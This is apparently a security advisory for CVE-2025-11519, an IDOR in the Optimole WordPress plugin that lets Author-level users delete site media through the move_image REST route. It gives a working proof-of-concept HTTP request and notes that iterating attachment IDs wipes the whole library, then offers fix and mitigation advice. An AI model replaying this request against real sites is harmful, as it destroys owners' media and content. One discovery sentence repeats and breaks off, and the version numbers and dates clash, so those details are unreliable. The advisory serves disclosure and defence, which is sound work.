Optimole (WP plugin, ~200k+ installs) optimizes images on the fly and can offload media to a CDN, replacing local files with remote versions to reduce bandwidth and storage. In Optimole WP 4.0.4 we identified CVE-2025-11519, an Insecure Direct Object Reference (IDOR) on the REST route /wp-json/optml/v1/move_image. Any authenticated user possessing the upload_files capability (e.g., Author) and a valid REST nonce can post arbitrary attachment IDs to trigger the offload flow, which deletes the local image and its generated variants after a CDN check. By iterating IDs (e.g., 1..9999), an attacker can mass-process the library and cause site-wide “missing image” failures, broken posts/pages, SEO degradation, and data loss that requires restoring from backups. Because this does not require admin privileges and can be fully automated, the severity is High.
| CVE | CVE-2025-11519 |
| Plugin Version | Image optimization service by Optimole <= 4.1.0 |
| Critical | High |
| All Time | 7 270 971 |
| Active installations | 200 000+ |
| Publicly Published | October 9, 2025 |
| Last Updated | October 9, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11519 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/optimole-wp/image-optimization-service-by-optimole-410-insecure-direct-object-reference-to-authenticated-author-media-offload |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| October 1, 2025 | Plugin testing and vulnerability detection in the Optimole – Optimize Images | Convert WebP & AVIF | CDN & Lazy Load | Image Optimization have been completed |
| October 1, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 17, 2025 | Registered CVE-2025-11519 |
Discovery of the Vulnerability
While auditing Optimole’s media offload mechanism, we found that the handler behind /optml/v1/move_image trusts the id in the request body and only verifies a general capability (presence of a REST nonce from the admin UI), not whether the caller owns the attachment or has permission to operate on it. In practice, an Author+ can send While auditing Optimole’s media offload mechanism, we found that the handler behind /optml/v1/move_image trusts the id in the request body and only verifies a general capability (presence of a REST nonce from the admin UI), not whether the caller owns the attachment or has permission to operate on it. In practice, an Author+ can send
Understanding of IDOR attack’s
IDOR (CWE-639) arises when a server accepts an object identifier (here, an attachment post ID) without verifying the caller’s right to act on that object. In WordPress, object-level authorization should pair a general capability (e.g., “can upload files?”) with a per-object check such as: current_user_can( ‘edit_post’, $attachment_id ) (or stricter). Common failures include allowing Editors/Authors to update/delete attachments they don’t own or operate on any post by numeric ID. Similar flaws have caused mass deletion, metadata tampering, and privacy leaks across numerous plugins. In Optimole’s case, the impact is amplified because offload also removes local copies, making the IDOR not just a permission bypass but a destructive action that directly affects availability and integrity of site media.
Exploiting the IDOR Vulnerability
To exploit CVE-2025-11519, an attacker with Author+ cookies:
POC:
POST /wordpress/index.php/wp-json/optml/v1/move_image HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php X-WP-Nonce: nonce_of_reset_from_post.php Connection: keep-alive Cookie: cookie_of_author+ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4 Content-Type: application/json Content-Length: 52 {"id":138,"action":"offload_image","status":"start"}____
Site-wide media DoS: Posts, pages, and products lose images (thumbnails, hero images, galleries). UX tanks; support volume spikes.
SEO degradation: Missing images reduce page quality signals, trigger broken-image warnings, and harm rankings and CTR.
Data loss & recovery costs: Restoring at scale from backups is time-consuming; if backups are partial or old, loss may be permanent.
Editorial disruption: Newsrooms and eCommerce catalogs lose visual assets mid-campaign, affecting revenue and reputation.
Insider abuse: A disgruntled author can mass-offload and delete local copies without admin approval.
Recommendations for Improved Security
- State validation & dry-run: Before deletion, verify rewrite/CDN is active and the remote object is available; introduce a dry-run or staging flag and explicit admin confirmation for bulk operations.
- Least destructive defaults: Prefer copy-then-swap with a rollback grace period; don’t remove local copies until a stable remote mapping is proven and persisted.
- Rate-limit & log: Throttle repeated offloads per user; log user ID, attachment ID, and outcome; emit admin notices for bulk activity.
- UI/REST parity: Match REST permissions to the UI’s intent—only expose offload for attachments visible/editable by the caller.
For site owners
- Update ASAP to a patched release once available.
- Restrict roles: Limit
upload_filesand reduce Author counts; consider elevating offload to Editor/Admin only via a temporary policy. - Backups & immutability: Ensure frequent, off-site backups of
wp-content/uploads/; consider immutable storage or object-level versioning. - Monitor anomalies: Alert on spikes of
move_imagecalls, large attachment churn, or sudden CDN/offload state changes. - Temporary mitigations: Use a WAF rule to challenge/deny
POST /optml/v1/move_imagefrom non-admin roles; if possible, gate the route behind server-side role checks until patched.
By taking proactive measures to address IDOR vulnerabilities like CVE-2025-11519 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #IDOR #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.